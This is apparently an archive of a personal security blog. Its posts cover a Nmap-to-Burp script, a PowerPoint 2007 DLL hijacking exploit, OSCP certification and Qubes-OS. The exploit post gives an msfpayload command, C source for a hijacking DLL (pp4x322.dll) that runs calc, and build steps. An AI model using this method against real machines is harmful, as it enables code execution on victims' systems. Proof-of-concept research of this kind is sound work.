Monstream00's

Import Nmap to Burp

monstream00 — Fri, 06 Jan 2012 23:48:19 +0000

It has been a while, but that is what happens when you have a new born and are working on your Masters Degree. I have just released a buby script that will combine the power of nmap into burp.

http://bazaar.launchpad.net/~miked1981/monstream00/monStream00/files/head:/bubyscripts/

How to run:
./runnmapburp.sh
Would you like to use Nmap/Burp?
1: No
2: Yes
2
What is the network range?
10.0.0.1/24
running nmap on scope…….
Loading: “attack_test.rb”

This will do a Nmap scan then spider the results of that scan while adding them to scope.

Have fun!!!!!!!!!!!

Microsoft Windows Power Point 2007 DLL Hijacking Exploit (pp4x322.dll)

monstream00 — Thu, 26 Aug 2010 00:24:12 +0000

Today is a crazy day with everyone and there mother searching for DLL Hijacking Exploits. They are going quick so get in before they are all gone. Bellow is a exploit I found for .pps files in MS Power Point 2007. Power Point looks for pp4x322.dll and loads it. This will not work with real .pps but will work with a text file if extension is changed to a .pps instead of .txt. I have tested it on Windows 7 64bit and it works. Rapid 7 has a great article on DLL Hijacking and it is a must read.

http://blog.metasploit.com/2010/08/exploiting-dll-hijacking-flaws.html

msfpayload windows/exec CMD=calc.exe D > pp4x322.dll
or
/*

Exploit Title: Microsoft Windows Power Point 2007 DLL Hijacking Exploit (pp4x322.dll)
Date: August 25, 2010
Author: monstream00 (monstream00 [at} hotmail.com)
Modified storm's exploit for pp4x322.dll and used Rapid7 write up to find. Happy hunting.
Rapid7 write up: http://blog.metasploit.com/2010/08/exploiting-dll-hijacking-flaws.html
Tested on: Windows 7 64bit, XP SP3 with MS Office PowerPoint 2007 SP2 MSO 12.0.6535.5002

http://monstream00.wordpress.com/

gcc -shared -o pp4x322.dll powerpoint2007-DLL.c



.pps file affected.

*/

#include windows.h

int hax()
{
WinExec("calc", 0);
exit(0);
return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
hax();
return 0;
}

Also see corelan for a unofficial list of DLL Hijacking Exploits.
http://www.corelan.be:8800/index.php/2010/08/25/dll-hijacking-kb-2269637-the-unofficial-list/

Offensive Security Certified Professional (OSCP) certification here I come!

monstream00 — Wed, 16 Jun 2010 03:38:14 +0000

Today I scheduled to take the Online Offensive Security PWB class so I can test my skills and hold an Offensive Security Certified Professional (OSCP) certification. I looked at Certified Ethical Hacker exam. Then I realized that a paper exam does not mean I would necessarily have the proof of the skills required to get in. That is where the OSCP lab comes in. It is a 24 hour lab and your certification is based on how much own-age you get. Sounds fun!!! Bellow is some information from there site with a link.

OSCP Certification

The Offensive Security Certified Professional (OSCP) is a unique and industry leading IT Security Certification that tests real world skills in the penetration testing field. No multiple choice questions, no theoretical fluff – The student will be expected to dive into an unknown network, craft custom tailored exploits, find security flaws, and exploit weaknesses within the architecture in order to pass the certification process. Students who successfully complete the Offensive Security PWB Penetration Testing Training certification challenge receive the OSCP certification. Penetration Testing with BackTrack simulates a full penetration test from start to finish by injecting the student into a rich, diverse and vulnerable network environment. Pre-Requisites

Pentesting with BackTrack is an entry-level course but still requires students to have certain knowledge prior to attending the class. A solid understanding of TCP/IP, networking, and reasonable Linux skills are required. This course is not for the faint of heart, it requires practice, testing, and the ability to want to learn in a manner that will grow your career in the information security field and defeat learning plateau’s. Offensive Security challenges you to rise above the rest, dive into the fine arts of advanced penetration testing, and “Try Harder”.

http://www.offensive-security.com/online-information-security-training/penetration-testing-backtrack/

I passed my OSCP exam!

Qubes-OS

monstream00 — Thu, 29 Apr 2010 17:44:19 +0000

Qubes-OS alpha was released recently. I installed Qubes-OS on a test computer and the installation directions were easy to understand and follow. I really like the Qubes-OS design because it separates your computer into multiple security domains. Also Invisible Things Lab has a great write up on the Qubes-OS architecture. It is well worth the read. I am looking forward to the full release of Qubes-OS!

“Qubes is an open source operating system designed to provide strong security for desktop computing. Qubes is based on Xen, X Window System, and Linux, and can run most Linux applications and utilize most of the Linux drivers. In the future it might also run Windows apps.

Qubes implements Security by Isolation approach. To do this, Qubes utilizes virtualization technology, to be able to isolate various programs from each other, and even sandbox many system-level components, like networking or storage subsystem, so that their compromise don’t affect the integrity of the rest of the system.

Qubes lets the user define many security domains implemented as lightweight Virtual Machines (VMs), or “AppVMs”. E.g. user can have “personal”, “work”, “shopping”, “bank”, and “random” AppVMs and can use the applications from within those VMs just like if they were executing on the local machine, but at the same time they are well isolated from each other. Qubes supports secure copy-and-paste and file sharing between the AppVMs, of course.” -http://qubes-os.org

Qubes-OS is supported by Invisible Things Lab and designed by Joanna Rutkowska and Rafal Wojtczuk.